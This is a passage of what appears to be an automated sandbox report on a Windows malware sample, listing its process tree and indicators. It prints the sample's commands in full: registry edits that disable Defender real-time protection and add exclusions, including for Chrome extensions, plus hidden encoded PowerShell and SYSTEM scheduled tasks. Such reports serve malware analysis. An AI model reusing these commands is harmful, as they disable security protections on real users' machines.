WMIC.exe Token: SeIncreaseQuotaPrivilege 1628 WMIC.exe Token: SeSecurityPrivilege 1628 WMIC.exe Token: SeTakeOwnershipPrivilege 1628 WMIC.exe Token: SeLoadDriverPrivilege 1628 WMIC.exe Token: SeSystemtimePrivilege 1628 WMIC.exe Token: SeBackupPrivilege 1628 WMIC.exe Token: SeRestorePrivilege 1628 WMIC.exe Token: SeShutdownPrivilege 1628 WMIC.exe Token: SeSystemEnvironmentPrivilege 1628 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2236 wrote to memory of 848 2236 cf613c83fd006ca96400f5e5cf2646edd93cc0755782021b52499084480d1f4d.exe 28 PID 2236 wrote to memory of 848 2236 cf613c83fd006ca96400f5e5cf2646edd93cc0755782021b52499084480d1f4d.exe 28 PID 2236 wrote to memory of 848 2236 cf613c83fd006ca96400f5e5cf2646edd93cc0755782021b52499084480d1f4d.exe 28 PID 2236 wrote to memory of 848 2236 cf613c83fd006ca96400f5e5cf2646edd93cc0755782021b52499084480d1f4d.exe 28 PID 2236 wrote to memory of 848 2236 cf613c83fd006ca96400f5e5cf2646edd93cc0755782021b52499084480d1f4d.exe 28 PID 2236 wrote to memory of 848 2236 cf613c83fd006ca96400f5e5cf2646edd93cc0755782021b52499084480d1f4d.exe 28 PID 2236 wrote to memory of 848 2236 cf613c83fd006ca96400f5e5cf2646edd93cc0755782021b52499084480d1f4d.exe 28 PID 848 wrote to memory of 2824 848 Install.exe 29 PID 848 wrote to memory of 2824 848 Install.exe 29 PID 848 wrote to memory of 2824 848 Install.exe 29 PID 848 wrote to memory of 2824 848 Install.exe 29 PID 848 wrote to memory of 2824 848 Install.exe 29 PID 848 wrote to memory of 2824 848 Install.exe 29 PID 848 wrote to memory of 2824 848 Install.exe 29 PID 2824 wrote to memory of 2908 2824 Install.exe 30 PID 2824 wrote to memory of 2908 2824 Install.exe 30 PID 2824 wrote to memory of 2908 2824 Install.exe 30 PID 2824 wrote to memory of 2908 2824 Install.exe 30 PID 2824 wrote to memory of 2908 2824 Install.exe 30 PID 2824 wrote to memory of 2908 2824 Install.exe 30 PID 2824 wrote to memory of 2908 2824 Install.exe 30 PID 2908 wrote to memory of 3016 2908 cmd.exe 32 PID 2908 wrote to memory of 3016 2908 cmd.exe 32 PID 2908 wrote to memory of 3016 2908 cmd.exe 32 PID 2908 wrote to memory of 3016 2908 cmd.exe 32 PID 2908 wrote to memory of 3016 2908 cmd.exe 32 PID 2908 wrote to memory of 3016 2908 cmd.exe 32 PID 2908 wrote to memory of 3016 2908 cmd.exe 32 PID 3016 wrote to memory of 3036 3016 forfiles.exe 33 PID 3016 wrote to memory of 3036 3016 forfiles.exe 33 PID 3016 wrote to memory of 3036 3016 forfiles.exe 33 PID 3016 wrote to memory of 3036 3016 forfiles.exe 33 PID 3016 wrote to memory of 3036 3016 forfiles.exe 33 PID 3016 wrote to memory of 3036 3016 forfiles.exe 33 PID 3016 wrote to memory of 3036 3016 forfiles.exe 33 PID 3036 wrote to memory of 3020 3036 cmd.exe 34 PID 3036 wrote to memory of 3020 3036 cmd.exe 34 PID 3036 wrote to memory of 3020 3036 cmd.exe 34 PID 3036 wrote to memory of 3020 3036 cmd.exe 34 PID 3036 wrote to memory of 3020 3036 cmd.exe 34 PID 3036 wrote to memory of 3020 3036 cmd.exe 34 PID 3036 wrote to memory of 3020 3036 cmd.exe 34 PID 2908 wrote to memory of 3040 2908 cmd.exe 35 PID 2908 wrote to memory of 3040 2908 cmd.exe 35 PID 2908 wrote to memory of 3040 2908 cmd.exe 35 PID 2908 wrote to memory of 3040 2908 cmd.exe 35 PID 2908 wrote to memory of 3040 2908 cmd.exe 35 PID 2908 wrote to memory of 3040 2908 cmd.exe 35 PID 2908 wrote to memory of 3040 2908 cmd.exe 35 PID 3040 wrote to memory of 2572 3040 forfiles.exe 36 PID 3040 wrote to memory of 2572 3040 forfiles.exe 36 PID 3040 wrote to memory of 2572 3040 forfiles.exe 36 PID 3040 wrote to memory of 2572 3040 forfiles.exe 36 PID 3040 wrote to memory of 2572 3040 forfiles.exe 36 PID 3040 wrote to memory of 2572 3040 forfiles.exe 36 PID 3040 wrote to memory of 2572 3040 forfiles.exe 36 PID 2572 wrote to memory of 2852 2572 cmd.exe 37 PID 2572 wrote to memory of 2852 2572 cmd.exe 37 PID 2572 wrote to memory of 2852 2572 cmd.exe 37 PID 2572 wrote to memory of 2852 2572 cmd.exe 37 PID 2572 wrote to memory of 2852 2572 cmd.exe 37 PID 2572 wrote to memory of 2852 2572 cmd.exe 37 PID 2572 wrote to memory of 2852 2572 cmd.exe 37 PID 2908 wrote to memory of 2960 2908 cmd.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\cf613c83fd006ca96400f5e5cf2646edd93cc0755782021b52499084480d1f4d.exe"C:\Users\Admin\AppData\Local\Temp\cf613c83fd006ca96400f5e5cf2646edd93cc0755782021b52499084480d1f4d.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Users\Admin\AppData\Local\Temp\7zSB2DB.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Users\Admin\AppData\Local\Temp\7zSC0FE.tmp\Install.exe.\Install.exe /LiwdidB "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:3036 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵PID:3020
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:2572 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵PID:2852
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"5⤵PID:2960
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2588
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵PID:2536
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"5⤵PID:2772
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2512
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵PID:2516
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵PID:2028
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵PID:2568
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2640 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force8⤵PID:2556
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵PID:2376
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵PID:2364
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1044 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1956
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "butYHpXTvMdZIJsEKZ" /SC once /ST 00:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\gvUvpqXuJGpWbAU\PXzTbUr.exe\" LY /ULtdidFckF 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2344
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn butYHpXTvMdZIJsEKZ"4⤵PID:2336
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn butYHpXTvMdZIJsEKZ5⤵PID:1348
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn butYHpXTvMdZIJsEKZ6⤵PID:1708
-
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {EE4DCBC7-E129-47BE-BD02-07824B4D4377} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2140
-
C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\gvUvpqXuJGpWbAU\PXzTbUr.exeC:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\gvUvpqXuJGpWbAU\PXzTbUr.exe LY /ULtdidFckF 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:816 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:924
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:788
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:1328
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:336
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:2684
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:2472
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:2756
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:2728
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2740
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2724
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:2716
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:2060
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:1824
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:3052
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:1816
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2484 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:1504
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gmZzeArCd" /SC once /ST 00:01:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1920
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gmZzeArCd"3⤵PID:1372
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gmZzeArCd"3⤵PID:2168
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1604
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1704
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1568
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1412
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ghHJGdKmh" /SC once /ST 00:02:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2296
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ghHJGdKmh"3⤵PID:1796
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ghHJGdKmh"3⤵PID:2604
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:2616
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:2932
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:940 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1512
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:323⤵PID:1884
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1888
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:643⤵PID:1940
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1020
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:323⤵PID:1284
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:324⤵PID:2220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:643⤵PID:1700
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:644⤵PID:1728
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\mrYrpJCpOmktZWwz\WkUaCkDW\MYFilmzqZwfhHPvG.wsf"3⤵PID:1708
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\mrYrpJCpOmktZWwz\WkUaCkDW\MYFilmzqZwfhHPvG.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1872 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:788
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2704
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1788
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2676
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NGysLhxJEZNwhMVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NGysLhxJEZNwhMVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1504
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1352
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:324⤵PID:1580
-
-
